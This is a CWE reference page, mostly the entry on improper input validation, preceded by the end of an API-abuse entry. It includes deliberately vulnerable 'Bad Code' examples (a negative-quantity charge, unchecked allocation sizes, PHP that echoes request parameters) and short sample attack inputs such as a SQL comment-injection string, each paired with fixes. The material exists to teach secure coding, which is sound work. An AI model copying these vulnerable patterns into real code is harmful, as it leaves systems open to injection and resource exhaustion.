ScopeEffect
Integrity
Other

Technical Impact: Quality degradation; Unexpected state

+ Observed Examples
ReferenceDescription
Linux-based device mapper encryption program does not check the return value of setuid and setgid, allowing attackers to execute code with unintended privileges.
File-system management programs call the setuid and setgid functions in the wrong order and do not check the return values, allowing attackers to gain unintended privileges.
C++ web server program calls Process::setuid before calling Process::setgid, preventing it from dropping privileges, potentially allowing CGI programs to be called with higher privileges than intended.
Crypto implementation removes padding when it shouldn't, allowing forged signatures.
Crypto implementation removes padding when it shouldn't, allowing forged signatures.
+ Potential Mitigations

Phases: Implementation; Architecture and Design

Always utilize APIs in the specified manner.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class710Coding Standards Violation
Research Concepts (primary)1000
ChildOfCategoryCategory1001SFP Secondary Cluster: Use of an Improper API
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base242Use of Inherently Dangerous Function
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant243Creation of chroot Jail Without Changing Working Directory
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant244Improper Clearing of Heap Memory Before Release ('Heap Inspection')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant245J2EE Bad Practices: Direct Management of Connections
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant246J2EE Bad Practices: Direct Use of Sockets
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base248Uncaught Exception
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness ClassWeakness Class250Execution with Unnecessary Privileges
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory251Often Misused: String Management
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base252Unchecked Return Value
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base253Incorrect Check of Function Return Value
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant350Reliance on Reverse DNS Resolution for a Security-Critical Action
Development Concepts699
ParentOfWeakness VariantWeakness Variant382J2EE Bad Practices: Use of System.exit()
Development Concepts699
ParentOfWeakness VariantWeakness Variant558Use of getlogin() in Multithreaded Application
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory559Often Misused: Arguments and Parameters
Development Concepts (primary)699
ParentOfWeakness ClassWeakness Class573Improper Following of Specification by Caller
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant586Explicit Call to Finalize()
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant589Call to Non-ubiquitous API
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base605Multiple Binds to the Same Port
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base648Incorrect Use of Privileged APIs
Research Concepts1000
ParentOfWeakness VariantWeakness Variant650Trusting HTTP Permission Methods on the Server Side
Development Concepts699
Research Concepts1000
ParentOfWeakness BaseWeakness Base684Incorrect Provision of Specified Functionality
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView699Development Concepts
Development Concepts (primary)699
MemberOfViewView700Seven Pernicious Kingdoms
Seven Pernicious Kingdoms (primary)700
PeerOfWeakness ClassWeakness Class675Duplicate Operations on Resource
Research Concepts1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsAPI Abuse
WASC42Abuse of Functionality
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Description, Relationships, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Name, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2010-12-13CWE Content TeamMITREInternal
updated Description
2011-03-29CWE Content TeamMITREInternal
updated Description, Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Observed_Examples, Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships
2017-05-03CWE Content TeamMITREInternal
updated Observed_Examples, Related_Attack_Patterns
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11API Abuse
2009-05-27Failure to Fulfill API Contract (aka 'API Abuse')
2011-03-29Failure to Fulfill API Contract ('API Abuse')

CWE-20: Improper Input Validation

Weakness ID: 20
Abstraction: Class
Status: Usable
Presentation Filter:
+ Description

Description Summary

The product does not validate or incorrectly validates input that can affect the control flow or data flow of a program.

Extended Description

When software does not validate input properly, an attacker is able to craft the input in a form that is not expected by the rest of the application. This will lead to parts of the system receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution.

+ Terminology Notes

The "input validation" term is extremely common, but it is used in many different ways. In some cases its usage can obscure the real underlying weakness or otherwise hide chaining and composite relationships.

Some people use "input validation" as a general term that covers many different neutralization techniques for ensuring that input is appropriate, such as filtering, canonicalization, and escaping. Others use the term in a more narrow context to simply mean "checking if an input conforms to expectations without changing it."

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

Platform Notes

Input validation can be a problem in any system that receives data from an external source.

+ Modes of Introduction

If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields cannot be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602).

+ Common Consequences
ScopeEffect
Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU); DoS: resource consumption (memory)

An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU.

Confidentiality

Technical Impact: Read memory; Read files or directories

An attacker could read confidential data if they are able to control resource references.

Integrity
Confidentiality
Availability

Technical Impact: Modify memory; Execute unauthorized code or commands

An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

Some instances of improper input validation can be detected using automated static analysis.

A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.

Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.

Manual Static Analysis

When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented.

Fuzzing

Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself.
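
A minimal sketch of such a fuzz loop is shown below; parseRecord() is a hypothetical stand-in for the routine under test, and IllegalArgumentException stands in for whatever application-controlled error the software is expected to raise:

(Good Code)
Example Language: Java 
import java.util.Random;

// Sketch: feed random byte strings to the routine under test and require that the
// only failure mode is the application's own, expected validation error.
static void fuzz(int iterations) {
    Random random = new Random(42); // fixed seed so runs are reproducible
    for (int i = 0; i < iterations; i++) {
        byte[] input = new byte[random.nextInt(256)];
        random.nextBytes(input);
        try {
            parseRecord(input); // hypothetical routine under test
        } catch (IllegalArgumentException expected) {
            // acceptable: the application detected and rejected the input
        }
        // any other exception, hang, or crash indicates missing input handling
    }
}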

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR Partial

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Fuzz Tester

  • Framework-based Fuzzer

Cost effective for partial coverage:

  • Host Application Interface Scanner

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Attack Modeling

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.

(Bad Code)
Example Language: Java 
...
public static final double price = 20.00;
int quantity = currentUser.getAttribute("quantity");
double total = price * quantity;
chargeUser(total);
...

The user has no control over the price variable; however, the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited.
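
One possible correction, sketched below, is to validate the quantity before computing the total; the MAX_QUANTITY limit is an illustrative business rule rather than part of the original example:

(Good Code)
Example Language: Java 
public static final double PRICE = 20.00;
public static final int MAX_QUANTITY = 100; // illustrative upper bound

public static double computeTotal(String quantityAttribute) {
    if (quantityAttribute == null) {
        throw new IllegalArgumentException("quantity is missing");
    }
    int quantity;
    try {
        quantity = Integer.parseInt(quantityAttribute.trim());
    } catch (NumberFormatException e) {
        throw new IllegalArgumentException("quantity is not a number");
    }
    // Reject non-positive or implausibly large quantities before charging the user.
    if (quantity <= 0 || quantity > MAX_QUANTITY) {
        throw new IllegalArgumentException("quantity out of range");
    }
    return PRICE * quantity;
}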

Example 2

This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.

(Bad Code)
Example Language: C 
...
#define MAX_DIM 100
...
/* board dimensions */
int m,n, error;
board_square_t *board;
printf("Please specify the board height: \n");
error = scanf("%d", &m);
if ( EOF == error ){
die("No integer passed: Die evil hacker!\n");
}
printf("Please specify the board width: \n");
error = scanf("%d", &n);
if ( EOF == error ){
die("No integer passed: Die evil hacker!\n");
}
if ( m > MAX_DIM || n > MAX_DIM ) {
die("Value too large: Die evil hacker!\n");
}
board = (board_square_t*) malloc( m * n * sizeof(board_square_t));
...

While this code checks to make sure the user cannot specify large positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values, which will cause an integer overflow (CWE-190), and unexpected behavior will follow depending on how the values are treated in the remainder of the program.
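
A Java analog of the missing check is sketched below; a plain two-dimensional array stands in for the board_square_t buffer, and both the lower and upper bounds are validated before any allocation:

(Good Code)
Example Language: Java 
static final int MAX_DIM = 100;

// Sketch: reject dimensions outside 1..MAX_DIM before allocating the board.
static int[][] allocateBoard(int m, int n) {
    if (m < 1 || m > MAX_DIM || n < 1 || n > MAX_DIM) {
        throw new IllegalArgumentException("board dimensions out of range");
    }
    return new int[m][n];
}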

Example 3

The following example shows a PHP application in which the programmer attempts to display a user's birthday and homepage.

(Bad Code)
Example Language: PHP 
$birthday = $_GET['birthday'];
$homepage = $_GET['homepage'];
echo "Birthday: $birthday<br>Homepage: <a href=$homepage>click here</a>"

The programmer intended for $birthday to be in a date format and $homepage to be a valid URL. However, since the values are derived from an HTTP request, if an attacker can trick a victim into clicking a crafted URL with <script> tags providing the values for birthday and / or homepage, then the script will run on the client's browser when the web server echoes the content. Notice that even if the programmer were to defend the $birthday variable by restricting input to integers and dashes, it would still be possible for an attacker to provide a string of the form:

(Attack)
 
2009-01-09--

If this data were used in a SQL statement, it would treat the remainder of the statement as a comment. The comment could disable other security-related logic in the statement. In this case, encoding combined with input validation would be a more useful protection mechanism.

Furthermore, XSS (CWE-79) and SQL injection (CWE-89) are just two of the potential consequences when input validation is not used. Depending on the context of the code, CRLF Injection (CWE-93), Argument Injection (CWE-88), or Command Injection (CWE-77) may also be possible.

Example 4

This function attempts to extract a pair of numbers from a user-supplied string.

(Bad Code)
Example Language: C 
void parse_data(char *untrusted_input){
int m, n, error;
error = sscanf(untrusted_input, "%d:%d", &m, &n);
if ( EOF == error ){
die("Did not specify integer value. Die evil hacker!\n");
}
/* proceed assuming n and m are initialized correctly */
}

This code attempts to extract two integer values out of a formatted, user-supplied input. However, if an attacker were to provide an input of the form:

(Attack)
 
123:

then only the m variable will be initialized. Subsequent use of n may result in the use of an uninitialized variable (CWE-457).
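
A sketch of a stricter parse in Java (the helper name is illustrative) rejects the input unless both ':'-separated fields are present and numeric:

(Good Code)
Example Language: Java 
// Sketch: accept only input of the exact form "<int>:<int>"; reject anything else.
static int[] parsePair(String untrustedInput) {
    String[] parts = untrustedInput.split(":", -1); // keep empty trailing fields
    if (parts.length != 2) {
        throw new IllegalArgumentException("expected two ':'-separated integers");
    }
    try {
        return new int[] { Integer.parseInt(parts[0].trim()), Integer.parseInt(parts[1].trim()) };
    } catch (NumberFormatException e) {
        throw new IllegalArgumentException("both fields must be integers");
    }
}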

Example 5

The following example takes a user-supplied value to allocate an array of objects and then operates on the array.

(Bad Code)
Example Language: Java 
private void buildList ( int untrustedListSize ){
if ( 0 > untrustedListSize ){
die("Negative value supplied for list size, die evil hacker!");
}
Widget[] list = new Widget [ untrustedListSize ];
list[0] = new Widget();
}

This example attempts to build a list from a user-specified value, and even checks to ensure a non-negative value is supplied. If, however, a 0 value is provided, the code will build an array of size 0 and then try to store a new Widget in the first location, causing an exception to be thrown.
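
A corrected sketch also rejects a zero size before allocating and indexing the array:

(Good Code)
Example Language: Java 
private void buildList(int untrustedListSize) {
    // Sketch: require at least one element before allocating and indexing.
    if (untrustedListSize < 1) {
        throw new IllegalArgumentException("list size must be positive");
    }
    Widget[] list = new Widget[untrustedListSize];
    list[0] = new Widget();
}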

Example 6

This application has registered to handle a URL when sent an intent:

(Bad Code)
Example Language: Java 
...
IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");
UrlHandlerReceiver receiver = new UrlHandlerReceiver();
registerReceiver(receiver, filter);
...
public class UrlHandlerReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if("com.example.URLHandler.openURL".equals(intent.getAction())) {
String URL = intent.getStringExtra("URLToOpen");
int length = URL.length();
...
}
}
}

The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called.
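
One possible fix, sketched below as a revision of the onReceive() method above, treats the extra as optional and checks for null before use:

(Good Code)
Example Language: Java 
@Override
public void onReceive(Context context, Intent intent) {
    if ("com.example.URLHandler.openURL".equals(intent.getAction())) {
        // The extra may be absent; treat it as optional instead of assuming it exists.
        String url = intent.getStringExtra("URLToOpen");
        if (url == null) {
            return; // ignore (or log) the malformed request
        }
        int length = url.length();
        ...
    }
}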

+ Observed Examples
ReferenceDescription
Eval injection in Perl program using an ID that should only contain hyphens and numbers.
SQL injection through an ID that was supposed to be numeric.
lack of input validation in spreadsheet program leads to buffer overflows, integer overflows, array index errors, and memory corruption.
insufficient validation enables XSS
driver in security product allows code execution due to insufficient validation
infinite loop from DNS packet with a label that points to itself
infinite loop from DNS packet with a label that points to itself
missing parameter leads to crash
HTTP request with missing protocol version number leads to crash
request with missing parameters leads to information exposure
system crash with offset value that is inconsistent with packet size
size field that is inconsistent with packet size leads to buffer over-read
product uses a blacklist to identify potentially dangerous content, allowing attacker to bypass a warning
security bypass via an extra header
use of extra data in a signature allows certificate signature forging
empty packet triggers reboot
incomplete blacklist allows SQL injection
NUL byte in theme name cause directory traversal impact to be worse
kernel does not validate an incoming pointer before dereferencing it
anti-virus product has insufficient input validation of hooked SSDT functions, allowing code execution
anti-virus product allows DoS via zero-length field
driver does not validate input from userland to the kernel
kernel does not validate parameters sent in from userland, allowing code execution
lack of validation of string length fields allows memory consumption or buffer over-read
lack of validation of length field leads to infinite loop
lack of validation of input to an IOCTL allows code execution
zero-length attachment causes crash
zero-length input causes free of uninitialized pointer
crash via a malformed frame structure
infinite loop from a long SMTP request
router crashes with a malformed packet
packet with invalid version number leads to NULL pointer dereference
crash via multiple "." characters in file extension
+ Potential Mitigations

Phase: Architecture and Design

Strategies: Input Validation; Libraries or Frameworks

Use an input validation framework such as Struts or the OWASP ESAPI Validation API. If you use Struts, be mindful of weaknesses covered by the CWE-101 category.

Phases: Architecture and Design; Implementation

Strategy: Identify and Reduce Attack Surface

Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
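
A minimal sketch of this whitelist strategy follows; the color set and the numeric-ID pattern are illustrative examples of "known good" definitions:

(Good Code)
Example Language: Java 
import java.util.Set;
import java.util.regex.Pattern;

// Sketch: accept only values that appear on an explicit whitelist, or that
// match a strict pattern such as a purely numeric ID.
static final Set<String> ALLOWED_COLORS = Set.of("red", "blue", "green");
static final Pattern NUMERIC_ID = Pattern.compile("^[0-9]{1,10}$");

static boolean isValidColor(String input) {
    return input != null && ALLOWED_COLORS.contains(input);
}

static boolean isValidId(String input) {
    return input != null && NUMERIC_ID.matcher(input).matches();
}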

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings.

Phase: Implementation

When your application combines data from multiple sources, perform the validation after the sources have been combined. The individual data elements may pass the validation step but violate the intended restrictions after they have been combined.

Phase: Implementation

Be especially careful to validate all input when invoking code that crosses language boundaries, such as from an interpreted language to native code. This could create an unexpected interaction between the language boundaries. Ensure that you are not violating any of the expectations of the language with which you are interfacing. For example, even though Java may not be susceptible to buffer overflows, providing a large argument in a call to native code might trigger an overflow.

Phase: Implementation

Directly convert your input type into the expected data type, such as using a conversion function that translates a string into a number. After converting to the expected data type, ensure that the input's values fall within the expected range of allowable values and that multi-field consistencies are maintained.
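
A brief sketch of this convert-then-check pattern (the field name and range are illustrative):

(Good Code)
Example Language: Java 
// Sketch: convert first, then enforce the allowable range.
static int parseAge(String input) {
    int age = Integer.parseInt(input.trim()); // rejects non-numeric input
    if (age < 0 || age > 150) {
        throw new IllegalArgumentException("age out of expected range");
    }
    return age;
}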

Phase: Implementation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass whitelist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.

Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.
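
A sketch of repeated canonicalization is shown below, using URL decoding as the example transformation and an iteration cap as a safeguard; whether repeated decoding is appropriate depends on which encodings the input is allowed to contain:

(Good Code)
Example Language: Java 
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Sketch: keep decoding until the value stops changing, with a small
// iteration cap to reject pathological inputs.
static String canonicalize(String input) {
    String current = input;
    for (int i = 0; i < 5; i++) {
        String decoded = URLDecoder.decode(current, StandardCharsets.UTF_8);
        if (decoded.equals(current)) {
            return decoded;
        }
        current = decoded;
    }
    throw new IllegalArgumentException("input did not stabilize after repeated decoding");
}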

Phase: Implementation

When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.

Phase: Testing

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Phase: Testing

Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory19Data Processing Errors
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class693Protection Mechanism Failure
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory738CERT C Secure Coding Section 04 - Integers (INT)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory742CERT C Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory746CERT C Secure Coding Section 12 - Error Handling (ERR)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory747CERT C Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C Secure Coding Standard734
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory872CERT C++ Secure Coding Section 04 - Integers (INT)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory876CERT C++ Secure Coding Section 08 - Memory Management (MEM)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory883CERT C++ Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory994SFP Secondary Cluster: Tainted Input to Variable
Software Fault Pattern (SFP) Clusters (primary)888
ChildOfCategoryCategory1005Input Validation and Representation
Seven Pernicious Kingdoms (primary)700
CanPrecedeWeakness ClassWeakness Class22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base41Improper Resolution of Path Equivalence
Research Concepts1000
CanPrecedeWeakness ClassWeakness Class74Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Research Concepts1000
CanPrecedeWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Research Concepts1000
ParentOfWeakness BaseWeakness Base15External Control of System or Configuration Setting
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory21Pathname Traversal and Equivalence Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness ClassWeakness Class73External Control of File Name or Path
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfCategoryCategory100Technology-Specific Input Validation Problems
Development Concepts (primary)699
ParentOfWeakness VariantWeakness Variant102Struts: Duplicate Validation Forms
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant103Struts: Incomplete validate() Method Definition
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant104Struts: Form Bean Does Not Extend Validation Class
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant105Struts: Form Field Without Validator
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant106Struts: Plug-in Framework not in Use
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant107Struts: Unused Validation Form
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant108Struts: Unvalidated Action Form
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant109Struts: Validator Turned Off
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant110Struts: Validator Without Form Field
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base111Direct Use of Unsafe JNI
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base112Missing XML Validation
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base113Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base114Process Control
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base117Improper Output Neutralization for Logs
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base129Improper Validation of Array Index
Development Concepts (primary)699
Research Concepts (primary)1000
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness BaseWeakness Base134Use of Externally-Controlled Format String
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base170Improper Null Termination
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base179Incorrect Behavior Order: Early Validation
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base180Incorrect Behavior Order: Validate Before Canonicalize
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base181Incorrect Behavior Order: Validate Before Filter
Development Concepts (primary)699
ParentOfWeakness BaseWeakness Base190Integer Overflow or Wraparound
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base466Return of Pointer Value Outside of Expected Range
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base470Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant554ASP.NET Misconfiguration: Not Using Input Validation Framework
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant601URL Redirection to Untrusted Site ('Open Redirect')
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ParentOfWeakness BaseWeakness Base606Unchecked Input for Loop Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant622Improper Validation of Function Hook Arguments
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant626Null Byte Interaction Error (Poison Null Byte)
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfCompound Element: ChainCompound Element: Chain680Integer Overflow to Buffer Overflow
Research Concepts (primary)1000
ParentOfCompound Element: ChainCompound Element: Chain690Unchecked Return Value to NULL Pointer Dereference
Research Concepts (primary)1000
ParentOfCompound Element: ChainCompound Element: Chain692Incomplete Blacklist to Cross-Site Scripting
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant781Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness VariantWeakness Variant785Use of Path Manipulation Function without Maximum-sized Buffer
Development Concepts699
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant789Uncontrolled Memory Allocation
Research Concepts1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
+ Relationship Notes

CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks.

However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name "O'Reilly" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded.

+ Research Gaps

